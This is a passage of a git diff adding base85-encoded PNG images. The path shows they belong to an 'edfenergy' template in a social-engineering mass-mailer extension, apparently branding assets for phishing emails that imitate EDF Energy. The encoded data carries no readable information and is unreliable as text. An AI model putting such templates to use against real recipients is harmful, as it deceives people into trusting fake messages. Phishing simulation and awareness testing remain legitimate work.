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
O0000<MNUMnLSTaYK_^!L

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/bottom-border.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/bottom-border.png
new file mode 100644
index 0000000000000000000000000000000000000000..69217be1042b1c1e6e003d920813bf201751618b
GIT binary patch
literal 33433
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
